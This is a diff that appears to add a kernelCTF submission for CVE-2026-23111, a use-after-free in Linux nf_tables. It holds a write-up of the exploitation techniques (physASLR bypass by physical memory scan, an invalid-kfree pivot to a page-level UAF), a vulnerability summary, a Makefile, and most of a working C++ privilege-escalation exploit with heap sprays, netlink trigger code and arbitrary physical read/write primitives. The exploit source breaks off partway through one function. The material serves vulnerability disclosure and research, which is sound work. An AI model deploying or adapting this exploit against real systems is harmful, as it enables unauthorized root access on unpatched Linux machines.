(1) { + aar(pipe_arr[pt_idx], tmp_buf, + CORE_PATTERN_PHYS_ADDR + cnt * 0x1000000, pt_addr, PG_SIZE); + char *core_pattern_addr = (char *)(pt_addr + (CORE_PATTERN_PHYS_ADDR & 0xfff)); + if (!strcmp(core_pattern_addr, "core")) { + // found kernel physical base at offset cnt * 0x1000000 + break; + } + cnt++; +} +``` + +Each iteration reads one page at a candidate physical address using our `aar()` (arbitrary address read) function, which works by rewriting a PTE to map a user-space virtual address to the target physical address. If the page contains the expected `"core"` string at the correct offset, we have found the kernel image. + +On typical configurations with a few GB of physical memory, this scan completes within a small number of iterations (less than ~256 for 4 GB of RAM at 16 MB intervals). Each attempt is a simple memory read with no side effects that would trigger detection or instability. + +This demonstrates that physASLR provides limited protection against attackers with physical memory access. Once an attacker can read/write arbitrary physical addresses (e.g., through page table corruption), the randomized base can be trivially recovered through sequential probing. Unlike virtual KASLR bypass techniques that typically require information leaks via side channels, OOB reads, or sprayed kernel pointers, this approach requires no information leak at all, only the ability to read physical memory. + +To the best of our knowledge, this is the first kernelCTF submission to bypass physASLR using a linear physical memory scan. + +## Exploiting unexpected behavior of invalid address `kfree` + +When `kfree()` is called on a pointer whose underlying slab page has already been freed and reassigned to a non-slab use (e.g., pipe buffer), the slab allocator can inadvertently free the page back to the page allocator: + +- [mm/slab_common.c:kfree()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/mm/slab_common.c?h=v6.6) +```c +void kfree(const void *object) +{ + struct folio *folio; + struct slab *slab; + struct kmem_cache *s; + // ... + folio = virt_to_folio(object); // [1] resolve physical page + if (unlikely(!folio_test_slab(folio))) { + free_large_kmalloc(folio, (void *)object); // [2] non-slab path + return; + } + slab = folio_slab(folio); + s = slab->slab_cache; + __kmem_cache_free(s, (void *)object, _RET_IP_); // [3] slab path +} +``` + +At [1], `kfree()` resolves the pointer to its physical page. If the page is no longer marked as a slab page, it takes the non-slab path at [2], which calls `free_large_kmalloc()`: + +- [mm/slab_common.c:free_large_kmalloc()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/mm/slab_common.c?h=v6.6) +```c +void free_large_kmalloc(struct folio *folio, void *object) +{ + unsigned int order = folio_order(folio); + + if (WARN_ON_ONCE(order == 0)) // [4] + pr_warn_once("object pointer: 0x%p\n", object); + // ... + __free_pages(folio_page(folio, 0), order); // [5] +} +``` + +The function warns if the folio order is 0 [4], but does not prevent the free. `__free_pages()` [5] frees the underlying page back to the page allocator regardless. This means `kfree()` on a stale pointer whose page has been repurposed to a non-slab use will trigger a warning but still free the page, turning a SLUB object UAF into a page UAF. + +In our exploit, we achieve this through two stages of cross-cache reclamation (`kmalloc-cg-128` -> `kmalloc-16` -> pipe page). First, the freed `nft_chain` object (`kmalloc-cg-128`) is reclaimed by `unix_address` objects (`kmalloc-16`). The `unix_address->refcnt` field at offset 0 overlaps with `nft_chain->use`, so the vulnerability's UAF decrement corrupts the refcount, leading to a premature `kfree()` of the `unix_address` while a server socket still holds a dangling reference. + +We then drain the `kmalloc-16` slab and spray pipe pages to reclaim the freed pages. The dangling `unix_address` pointer now points into a pipe buffer page, which is no longer a slab page. When we close the remaining server socket, `unix_sock_destructor()` calls `kfree()` on this dangling pointer. Since the page is no longer a slab page, `folio_test_slab()` [1] fails and `kfree()` takes the non-slab path [2], freeing the pipe page back to the page allocator. A page table spray then reclaims it, creating a pipe buffer / page table overlap that provides arbitrary physical read/write. + +This technique generalizes: any situation where a UAF access corrupts a refcount field of a cross-cache overlapping object can be pivoted into a page-level primitive via the resulting double free. The premature free effectively "promotes" a SLUB object UAF to a page UAF, bypassing slab-level mitigations such as `CONFIG_RANDOM_KMALLOC_CACHES`. This is particularly useful in scenarios where the attacker does not have enough control over the freed object's content to exploit it at the slab level (e.g., no heap/KASLR leak for traditional slab-based techniques). By escalating to the page level, we gain physical AARW without ever needing a kernel address leak. + +Interestingly, this technique is prevented on the [mitigation instance](https://github.com/thejh/linux/tree/4c5b4a60a8f52798223807f76442e96d9eb15046) by `CONFIG_SLAB_VIRTUAL`, though likely as an unintended side effect rather than a deliberate defense against this specific attack pattern. With `CONFIG_SLAB_VIRTUAL`, slab objects are accessed through a dedicated virtual address range (`SLAB_DATA_BASE_ADDR`), decoupled from the underlying physical pages. When a slab page is freed via `__free_slab()`, the PTEs for the slab's virtual address range are cleared: + +- [mm/slub.c:__free_slab() (CONFIG_SLAB_VIRTUAL)](https://github.com/thejh/linux/blob/4c5b4a60a8f52798223807f76442e96d9eb15046/mm/slub.c) +```c +#ifdef CONFIG_SLAB_VIRTUAL +static void __free_slab(struct kmem_cache *s, struct slab *slab) +{ + // ... + for (i = 0; i < pages; i++) { + ptep_clear(...); // clear PTE for each slab page + } + // queue for TLB flush and physical page deallocation +} +#endif +``` + +After our cross-cache step (chain freed from `kmalloc-cg-128`, page returned to page allocator, reclaimed by `kmalloc-16`), the stale chain pointer's virtual address is no longer mapped. Any UAF access through this pointer, such as the `nft_data_release()` decrement on `chain->use`, would fault or be rejected by `virt_to_slab()`, which checks `is_slab_addr()` and validates slab metadata: + +- [mm/slab.h:virt_to_slab() (CONFIG_SLAB_VIRTUAL)](https://github.com/thejh/linux/blob/4c5b4a60a8f52798223807f76442e96d9eb15046/mm/slab.h) +```c +static inline struct slab *virt_to_slab(const void *addr) +{ + struct slab *slab, *slab_head; + + if (!is_slab_addr(addr)) // reject if not in slab virtual range + return NULL; + + slab = (struct slab *)virt_to_slab_raw((unsigned long)addr); + slab_head = slab->compound_slab_head; + + if (CHECK_DATA_CORRUPTION(!is_slab_meta(slab_head), + "compound slab head out of meta range: %p", slab_head)) + return NULL; + + return slab_head; +} +``` + +The decoupling of slab virtual addresses from physical pages means that cross-cache reuse does not preserve the old pointer's validity, which happens to block the UAF field overlap that our technique relies on. The original design goal of `CONFIG_SLAB_VIRTUAL` is to prevent cross-cache attacks, but this incidental invalidation of stale pointers also closes off the escalation path from SLUB-level UAF to page-level UAF. + +To the best of our knowledge, this is the first kernelCTF submission to exploit invalid `kfree` behavior to pivot a SLUB UAF into a page-level UAF. diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/vulnerability.md new file mode 100644 index 000000000..9516e87f6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/vulnerability.md @@ -0,0 +1,29 @@ +# Vulnerability + +A use-after-free vulnerability was found in the Linux kernel's Netfilter nf_tables subsystem (`net/netfilter/nf_tables_api.c`). Inverted genmask check in `nft_map_catchall_activate()` abort path leading to chain refcount and use-after-free of `nft_chain` object. This leads to local privilege escalation (LPE). + +## Requirements to trigger the vulnerability: +- Capabilities: To trigger the vulnerability, `CAP_NET_ADMIN` capability is required to access the Netfilter system. +- Kernel configuration: Kernel configs related to the Netfilter nf_tables system (e.g., `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`) are required to trigger this vulnerability. This config is generally enabled by default (ex. x86_64_defconfig). +- Are user namespaces needed?: Yes. As this vulnerability requires `CAP_NET_ADMIN`, which is not usually given to the normal user, we used the unprivileged user namespace to achieve this capability. + +## Commit which introduced the vulnerability +- This vulnerability was introduced in Linux v6.4, with commit [628bd3e49cba1c066228e23d71a852c23e26da73]https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=628bd3e49cba1c066228e23d71a852c23e26da73) +- This commit fixes an inverted genmask check in nft_map_catchall_activate() abort path that caused chain refcount underflow and use-after-free in nf_tables. + +## Commit which fixed the vulnerability +- This vulnerability was fixed in Linux v6.19, with commit [f41c5d151078c5348271ffaf8e7410d96f2d82f8](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f41c5d151078c5348271ffaf8e7410d96f2d82f8) +- This commit moves map element reference dropping from the set `.destroy` phase to the preparation phase to prevent refcount imbalance and spurious EBUSY errors in nf_tables. + +## Affected kernel versions +- Linux version v6.4 ~ v6.19 affects to this vulnerability + +## Affected component, subsystem +- net/netfilter (nf_tables) + +## Cause (UAF, BoF, race condition, double free, refcount overflow, etc) +- Use-after-free + +## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.) +- Disable syscalls for Netfilter (specifically, Netfilter nf_tables) system (ex. `socket`, `sendmsg` with Netlink socket) to prevent this vulnerability. +- Disable syscalls for unprivileged user namespace (ex. `clone`, `unshare`) can reduce the attack surface since the Netfilter system requires `CAP_NET_ADMIN` to use. diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/Makefile b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/Makefile new file mode 100644 index 000000000..6a4ee7a0b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/Makefile @@ -0,0 +1,58 @@ +CC = g++ +SRCS := ./exploit.cpp +TARGETS := exploit exploit_debug +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build +LIBXDK_DIR = $(realpath ./)/libxdk_build + +CFLAGS = -w -static -Wall -fpermissive +LIBS = -L$(LIBMNL_DIR)/install/usr/local/lib -L$(LIBNFTNL_DIR)/install/usr/local/lib -L$(LIBXDK_DIR)/lib -lnftnl -lmnl -lkernelXDK -lkeyutils +INCLUDES = -I$(LIBMNL_DIR)/install/usr/local/include -I$(LIBNFTNL_DIR)/install/usr/local/include -I$(LIBXDK_DIR)/include + +all: exploit + +exploit : libmnl-build libnftnl-build libxdk-build target_db.kxdb + $(CC) $(CFLAGS) $(SRCS) -o $@ $(INCLUDES) $(LIBS) + +exploit_debug: CFLAGS += -g -DDEBUG +exploit_debug: libmnl-build libnftnl-build libxdk-build target_db.kxdb + $(CC) $(CFLAGS) $(SRCS) -o $@ $(INCLUDES) $(LIBS) + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && mkdir ../install && make DESTDIR=`realpath ../install` install + +libnftnl-build : libmnl-build libnftnl-download + tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.1.tar.bz2 + cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/usr/local/lib/pkgconfig ./configure --enable-static + cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/usr/local/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/usr/local/lib make -j`nproc` + cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && mkdir ../install && make DESTDIR=`realpath ../install` install + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + + +libnftnl-download : + mkdir $(LIBNFTNL_DIR) + wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.1.tar.bz2 + +libxdk-build : + mkdir -p $(LIBXDK_DIR) + wget -O $(LIBXDK_DIR)/libxdk-v0.1.tar.gz https://github.com/google/kernel-research/releases/download/libxdk/v0.1/libxdk-v0.1.tar.gz + tar -C $(LIBXDK_DIR) -xzf $(LIBXDK_DIR)/libxdk-v0.1.tar.gz + +target_db.kxdb : + wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +.PHONY: all libmnl-build libnftnl-build libxdk-build libmnl-download libnftnl-download clean +clean: + rm -f $(TARGETS) + if [ -d $(LIBMNL_DIR)/libmnl-1.0.5 ]; then cd $(LIBMNL_DIR)/libmnl-1.0.5 && make DESTDIR=`realpath ../install` uninstall; fi + if [ -d $(LIBNFTNL_DIR)/libnftnl-1.2.1 ]; then cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && make DESTDIR=`realpath ../install` uninstall; fi + rm -rf $(LIBMNL_DIR) + rm -rf $(LIBNFTNL_DIR) + rm -rf $(LIBXDK_DIR) + rm -f target_db.kxdb diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit new file mode 100644 index 000000000..554e2f91c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit.cpp b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit.cpp new file mode 100644 index 000000000..8e552f44b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit.cpp @@ -0,0 +1,989 @@ +// g++ exploit.cpp -o exploit -lmnl -lnftnl -lkernelXDK -lkeyutils -w +// Must run as root +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include // getrlimit, setrlimit, unshare, open +#include // O_WRONLY +#include // struct rlimit, RLIMIT_* +#include // unshare, CLONE_NEW*, sched_setaffinity +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#ifndef htons +#define htons(x) __builtin_bswap16((uint16_t)(x)) +#endif +#ifndef htonl +#define htonl(x) __builtin_bswap32((uint32_t)(x)) +#endif + +INCBIN(target_db, "target_db.kxdb"); + +#define DEBUG + +#ifdef DEBUG +#define DEBUG_PRINT printf +#else +#define DEBUG_PRINT(...) ((void)0) +#endif + +struct msgp +{ + long mtype; + char mtext[1]; +}; + +void init_msgq(int *msgq_arr, size_t cnt) +{ + for (size_t i = 0; i < cnt; i++) + if ((msgq_arr[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) < 0) + perror("msgget"); +} + +int send_msg(int msgqid, char *data, size_t size, long mtype) +{ + struct msgp *m = malloc(sizeof(long) + size); + int ret = -1; + memcpy(m->mtext, data, size); + m->mtype = mtype; + + ret = msgsnd(msgqid, m, size, 0); + + free(m); + return ret; +} + +void spray_msgsnd(int *msgq_arr, size_t spray_size, size_t cache_size, size_t msg_msg_hdr_size, char *data, size_t iter, long mtype) +{ + for (size_t i = 0; i < spray_size; i++) + for (size_t j = 0; j < iter; j++) + { + if (msgq_arr[i] < 0) + continue; + if (send_msg(msgq_arr[i], data, cache_size - msg_msg_hdr_size, mtype) < 0) + perror("msgsnd"); + } + return; +} + +void release_msg(int *msgq_arr, size_t spray_size) +{ + int ret; + char msg_buf[0x2000]; + struct msgp *msg = (struct msgp *)msg_buf; + + for (size_t i = 0; i < spray_size; i++) + { + if (msgq_arr[i] < 0) + continue; + memset(msg_buf, 0, sizeof(msg_buf)); + ret = msgrcv(msgq_arr[i], msg, sizeof(msg_buf) - 1, 0, IPC_NOWAIT); + if (ret < 0) + perror("msgrcv"); + } +} + +void init_unix_sock(int *sock_arr, size_t cnt) +{ + for(int i = 0; i < cnt; i++){ + if ((sock_arr[i] = socket(AF_UNIX, SOCK_STREAM, 0)) < 0) { + perror("init_unix_sock socket"); + for(;;); + } + int flags = fcntl(sock_arr[i], F_GETFL, 0); + if (flags < 0) { + perror("init_unix_sock fcntl F_GETFL"); + for(;;); + } + + if (fcntl(sock_arr[i], F_SETFL, flags | O_NONBLOCK) < 0){ + perror("init_unix_sock fcntl F_SETFL"); + for(;;); + } + } + +} + +/* + * nft_map_catchall_activate() inverted activity check PoC + * + * Since libnftnl's NFTNL_SET_ELEM_VERDICT/CHAIN may not work on all + * versions, we build the NEWSETELEM message with raw netlink attributes + * for the verdict data. + */ + +static struct mnl_socket *nl; +static unsigned int portid; +static char buf[0x4000 * 2]; + +/* ── netlink helpers ── */ +static int send_batch_and_recv(struct mnl_nlmsg_batch *batch) +{ + int ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)); + mnl_nlmsg_batch_stop(batch); + if (ret < 0) return ret; + + int last_error = 0; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + while (ret > 0) { + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + int len = ret; + while (mnl_nlmsg_ok(nlh, len)) { + if (nlh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = mnl_nlmsg_get_payload(nlh); + if (e->error != 0) { + last_error = e->error; + DEBUG_PRINT(" [nlerr] seq=%u error=%d (%s)\n", + nlh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + nlh = mnl_nlmsg_next(nlh, &len); + } + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + return last_error; +} + +static void batch_begin(struct mnl_nlmsg_batch *batch, uint32_t *seq) +{ + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); +} + +static void batch_end(struct mnl_nlmsg_batch *batch, uint32_t *seq) +{ + nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); +} + +/* ── table ── */ +static void add_table(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *name) +{ + struct nftnl_table *t = nftnl_table_alloc(); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWTABLE, family, + NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_table_nlmsg_build_payload(nlh, t); + mnl_nlmsg_batch_next(batch); + nftnl_table_free(t); +} + +static void del_table(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *name) +{ + struct nftnl_table *t = nftnl_table_alloc(); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELTABLE, family, + NLM_F_ACK, (*seq)++); + nftnl_table_nlmsg_build_payload(nlh, t); + mnl_nlmsg_batch_next(batch); + nftnl_table_free(t); +} + +/* ── chain ── */ +static void add_chain(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *chain, bool is_base) +{ + struct nftnl_chain *c = nftnl_chain_alloc(); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain); + if (is_base) { + nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, NF_INET_LOCAL_IN); + nftnl_chain_set_s32(c, NFTNL_CHAIN_PRIO, 0); + nftnl_chain_set_str(c, NFTNL_CHAIN_TYPE, "filter"); + nftnl_chain_set_u32(c, NFTNL_CHAIN_POLICY, NF_ACCEPT); + } + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, family, + NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_chain_nlmsg_build_payload(nlh, c); + mnl_nlmsg_batch_next(batch); + nftnl_chain_free(c); +} + +static void del_chain(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, const char *chain) +{ + struct nftnl_chain *c = nftnl_chain_alloc(); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain); + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELCHAIN, family, + NLM_F_ACK, (*seq)++); + nftnl_chain_nlmsg_build_payload(nlh, c); + mnl_nlmsg_batch_next(batch); + nftnl_chain_free(c); +} + +/* ── verdict map (NEWSET) ── */ +static void add_verdict_map(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name, uint32_t set_id) +{ + struct nftnl_set *s = nftnl_set_alloc(); + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_str(s, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(s, NFTNL_SET_ID, set_id); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, 4); + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); /* inet_service */ + nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, 0xffffff00); + nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, sizeof(uint32_t)); + nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_set_nlmsg_build_payload(nlh, s); + mnl_nlmsg_batch_next(batch); + nftnl_set_free(s); +} + +/* + * ── Build NEWSETELEM with catchall + goto verdict using raw NLA ── + * + * The netlink message structure for a set element with verdict data: + * + * NFT_MSG_NEWSETELEM + * NFTA_SET_ELEM_LIST_TABLE = "poc_table" + * NFTA_SET_ELEM_LIST_SET = "vmap" + * NFTA_SET_ELEM_LIST_SET_ID = 100 + * NFTA_SET_ELEM_LIST_ELEMENTS (nested) + * NFTA_LIST_ELEM (nested) + * NFTA_SET_ELEM_FLAGS = NFT_SET_ELEM_CATCHALL + * NFTA_SET_ELEM_DATA (nested) + * NFTA_DATA_VERDICT (nested) + * NFTA_VERDICT_CODE = NFT_GOTO (-3) + * NFTA_VERDICT_CHAIN = "target_chain" + */ +static void add_catchall_elem_raw(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name, uint32_t set_id, + const char *goto_chain) +{ + struct nlmsghdr *nlh; + struct nfgenmsg *nfg; + + nlh = mnl_nlmsg_put_header(mnl_nlmsg_batch_current(batch)); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ACK; + nlh->nlmsg_seq = (*seq)++; + + nfg = mnl_nlmsg_put_extra_header(nlh, sizeof(*nfg)); + nfg->nfgen_family = family; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(0); + + /* NFTA_SET_ELEM_LIST_TABLE */ + mnl_attr_put_strz(nlh, NFTA_SET_ELEM_LIST_TABLE, table); + /* NFTA_SET_ELEM_LIST_SET */ + mnl_attr_put_strz(nlh, NFTA_SET_ELEM_LIST_SET, set_name); + /* NFTA_SET_ELEM_LIST_SET_ID */ + mnl_attr_put_u32(nlh, NFTA_SET_ELEM_LIST_SET_ID, htonl(set_id)); + + /* NFTA_SET_ELEM_LIST_ELEMENTS (nested) */ + struct nlattr *nest_elems = mnl_attr_nest_start(nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + + /* NFTA_LIST_ELEM (nested) — one element */ + struct nlattr *nest_elem = mnl_attr_nest_start(nlh, 1); /* NFTA_LIST_ELEM = 1 */ + + /* NFTA_SET_ELEM_FLAGS = NFT_SET_ELEM_CATCHALL (0x20) */ + mnl_attr_put_u32(nlh, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + + /* NFTA_SET_ELEM_DATA (nested) */ + struct nlattr *nest_data = mnl_attr_nest_start(nlh, NFTA_SET_ELEM_DATA); + + /* NFTA_DATA_VERDICT (nested) */ + struct nlattr *nest_verdict = mnl_attr_nest_start(nlh, NFTA_DATA_VERDICT); + + /* NFTA_VERDICT_CODE = NFT_GOTO */ + mnl_attr_put_u32(nlh, NFTA_VERDICT_CODE, htonl(NFT_GOTO)); + /* NFTA_VERDICT_CHAIN = "target_chain" */ + mnl_attr_put_strz(nlh, NFTA_VERDICT_CHAIN, goto_chain); + + mnl_attr_nest_end(nlh, nest_verdict); + + mnl_attr_nest_end(nlh, nest_data); + + mnl_attr_nest_end(nlh, nest_elem); + + mnl_attr_nest_end(nlh, nest_elems); + + mnl_nlmsg_batch_next(batch); +} + +/* ── DELSET + failing NEWRULE → abort ── */ +static void trigger_abort(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name) +{ + /* Step 1: DELSET — prepare succeeds, catchall deactivated, chain->use-- */ + struct nftnl_set *s = nftnl_set_alloc(); + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_str(s, NFTNL_SET_NAME, set_name); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, family, + NLM_F_ACK, (*seq)++); + nftnl_set_nlmsg_build_payload(nlh, s); + mnl_nlmsg_batch_next(batch); + nftnl_set_free(s); + + /* Step 2: NEWRULE on non-existent chain → fails → batch aborts */ + struct nftnl_rule *rule = nftnl_rule_alloc(); + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family); + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "__nonexistent_chain__"); + + nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWRULE, family, + NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + nftnl_rule_free(rule); +} + +int ulimit_fd(void) { + struct rlimit rlim; + + // Get the current resource limits + if (getrlimit(RLIMIT_NOFILE, &rlim) == -1) { + perror("getrlimit"); + return 1; + } + + DEBUG_PRINT("Current maximum file descriptors limit: %ld\n", rlim.rlim_cur); + + // Increase the maximum file descriptors limit + rlim.rlim_cur = rlim.rlim_max; + if (setrlimit(RLIMIT_NOFILE, &rlim) == -1) { + perror("setrlimit"); + return 1; + } + + // Get the updated resource limits + if (getrlimit(RLIMIT_NOFILE, &rlim) == -1) { + perror("getrlimit"); + return 1; + } + + DEBUG_PRINT("New maximum file descriptors limit: %ld\n", rlim.rlim_cur); + + return 0; +} + +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + + unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); + + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + + return; +} + +void set_cpu_affinity(int cpu_n, pid_t pid) { + cpu_set_t *set = malloc(sizeof(cpu_set_t)); + + CPU_ZERO(set); + CPU_SET(cpu_n, set); + + if (sched_setaffinity(pid, sizeof(set), set) < 0){ + perror("sched_setaffinity"); + return; + } + free(set); +} + +/* ══════════════════════════════════════════════════════════════════ */ + +#define DEFRAG_MSG_SPARY_SZ 0x200 +#define DEFRAG_SOCK_SPARY_SZ 0x200 +#define CC_MSG_SPARY_SZ 0x400 +#define RECLAIM_SOCK_SPARY_SZ 0x400 +#define PIPE_SPARY_SZ 0x80 + +#define UNIX_MAGIC_ADDR 0xdeadbeef + +#define MSG_MSG_SIZE 0x80 +#define PG_SIZE 0x1000 + +#define PT_SPRAY_SZ 0x100 +#define MMAP_ADDR 0x10000000 +#define MMAP_GAP 0x200000 +#define MMAP_SZ (PT_SPRAY_SZ * MMAP_GAP) + + +void flush_tlb(void *ptr, size_t count) { + if (mprotect(ptr, count, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) { + perror("flush_tlb mprotect 1"); + for(;;); + } + if (mprotect(ptr, count, PROT_READ | PROT_WRITE) < 0) { + perror("mprotect mprotect 2"); + for(;;); + } + sched_yield(); + asm volatile("clflush 0(%0)\n" : : "c"(ptr) : "rax"); +} + +void hex_dump(const void *data, size_t len) +{ + const unsigned char *p = data; + + for (size_t i = 0; i < len; i++) { + DEBUG_PRINT("%02x ", p[i]); + if ((i & 0xF) == 0xF) + putchar('\n'); + } + + if (len & 0xF) + putchar('\n'); +} + +void aar(int fd[], void *virt_dst, void *phys_src, void *corrupted_addr, size_t len) +{ + size_t num_pages; + uintptr_t tmp[PG_SIZE / sizeof(uintptr_t)]; + uintptr_t offset, p; + int flags, i; + + offset = (uintptr_t)phys_src & 0xfff; + p = (uintptr_t)phys_src & ~0xfff; + + num_pages = (len + PG_SIZE - 1) / PG_SIZE; + + if (read(fd[0], tmp, PG_SIZE) != PG_SIZE) { + perror("aar read"); + for(;;); + } + + flags = tmp[0] & 0xfff; + + for (i = 0; i < num_pages; ++i) { + tmp[i] = flags | p | 0x8000000000000000; + p += PG_SIZE; + } + + if (write(fd[1], tmp, PG_SIZE) != PG_SIZE) { + perror("aar write"); + for(;;); + } + + flush_tlb(corrupted_addr, len); + memcpy(virt_dst, corrupted_addr + offset, len); +} + +void aaw(int fd[], void *phys_dst, void *virt_src, void *corrupted_addr, size_t len) +{ + size_t num_pages; + uintptr_t tmp[PG_SIZE / sizeof(uintptr_t)]; + uintptr_t dst, offset, p; + int flags, i; + + dst = (uintptr_t)phys_dst; + offset = dst & 0xfff; + dst ^= offset; + p = dst; + + num_pages = (len + PG_SIZE - 1) / PG_SIZE; + + if (read(fd[0], tmp, PG_SIZE) != PG_SIZE) { + perror("aaw read"); + for(;;); + } 